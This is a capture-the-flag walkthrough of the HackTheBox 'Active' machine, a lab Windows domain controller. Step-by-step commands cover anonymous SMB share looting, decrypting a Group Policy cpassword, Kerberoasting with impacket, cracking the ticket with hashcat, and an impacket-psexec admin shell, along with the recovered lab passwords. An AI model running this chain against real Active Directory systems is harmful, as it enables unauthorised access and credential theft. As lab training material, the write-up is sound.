Active HackTheBox WalkThrough
This is Active HackTheBox machine walkthrough and is also the 26th machine of our OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to Active HackTheBox machine. But before diving into the hacking part let us know something about this box. It is a Windows OS machine with IP address 10.10.10.100 and difficulty easy assigned by its maker.
Since this machine is retired so you will require VIP subscription at hackthebox.eu to access this machine. So first of all, connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.100. If all goes correct then start hacking.
As usual I started by scanning the machine. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below: –
Scanning
$ sudo nmap -sC -sV -T3 -sT -oN Active.nmap 10.10.10.100
Nmap found many numbers of ports as open. Among these ports, port no 53, 88, 135, 139, 389 and 445 are enumerable because we have various tools available for doing enumeration on these posts. All the dynamic ports (port no. > 49151) are ignored because they have no any registered services running over them. Only static ports have some registered services running over them therefore, it is always worth in giving a look on every static as well as well-known ports during security assessment. Port no 53 has Domain, 88 has Kerberos, 135 has Microsoft RPC, 139 & 445 have SMB and 389 has LDAP service running over them.
Domain service on port 53 revealed that the server Operating System in Windows Server 2008 R2 SP1. Some other services like Kerberos and Ldap confirmed that Active Directory Service is running over it.
SMB Enumeration
Since SMB port is open so we will start by enumerating on it. Because, sometimes if anonymous login is allowed then we can get information about open shares and other useful stuffs. There are many numbers of SMB enumeration tools available like $smbmap, $smbclient, $enum4linux and even many nmap scripts (check /usr/share/nmap/scripts/ for nmap scripts). I have used $smbmap for this task.
Anonymous login is allowed and we have READ permission to the folder Replication. Let us download all the files of this folder and check what useful information we can gather from these files.
$ smbmap -H 10.10.10.100
$ smbclient \\\\10.10.10.100\\Replication
smb:\> recurse ON
smb:\> prompt OFF
smb:\> mget *
smb:\> exit
We got cpassword inside Groups.xml file. This is file where Windows Server 2008 and earlier versions used to store user credential. When a new GPP (Group Policy Preference) is created, there’s an associated XML file created in SYSVOL with the relevant configuration data and for security reasons, Microsoft encrypts the password using AES algorithm before storing as cpassword.
$ cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
From above file we can get some useful information like,
Domain Name: active.htb
UserName: SVC_TGS
cPassword: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Cracking GPP Password
Let us crack cPassword using $gpp-decrypt (Inbuild tool in kali to crack cPassword)
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
We can also use gpppfinder for this task. Let us crack cPassword using gpppfinder.
$ sudo git clone https://bitbucket.org/grimhacker/gpppfinder.git
$ cd gpppfinder/ && ls
$ pip3 install -r requirements.txt
$ sudo chmod +x cli.py
$ sudo python3 cli.py -D edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
From above we got credential Active.htb\SVC_TGS: GPPstillStandingStrong2k18. If the version of this windows would be Windows Server 2012 and above or would have port 5985/5986 opened then I would try $evil-winrm to get shell. But no any port is open for Windows Remote Management on this machine. If GPPstillStandingStrong2k18 would be administrator password then I would try impacket’s psexec.py to connect to remote machine via SMB port. But it is not admin credential.
Active Directory Enumeration
We have a credential of domain connected user i.e., Active.htb\SVC_TGS. Let us check what we can enumerate using this credential. The post exploitation tool impacket’s $impacket-GetADUsers command revealed that active machine has 4 users.
Once we have a list of users, we can try each user one by one which user is kerberoastable. For more information on kerberoasting attack check this pdf. $impacket-GetUserSPNs gave me a ticket which can be cracked offline using $hashcat (an offline password cracker).
$ impacket-GetADUsers -all -dc-ip 10.10.10.100 active.htb/SVC_tgs:GPPstillStandingStrong2k18
$ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_tgs:GPPstillStandingStrong2k18
Cracking Kerberos Ticket
Let us crack the password using $hashcat.
$ hashcat -m 13100 -a 3 hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 13100 -a 3 hash.txt /usr/share/wordlists/rockyou.txt --show
Hashcat found the password Ticketmaster1968 and this is administrator password. Since we have port no 445 open so let us use psexec module of impacket to get admin shell.
Note: We can get shell using psexec only if we have admin credential or we need to be a user who has write permission to the SMB shares. For more info about psexec check this article.
Getting Admin Shell
$ impacket-psexec administrator:[email protected]
We have got admin shell. Let us capture user and root flag.
Capture User Flag
$ type C:\Users\SVC_TGS\Desktop\user.txt
Capture Root Flag
$ type C:\Users\Administrator\Desktop\root.txt
This was how I rooted Active HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].
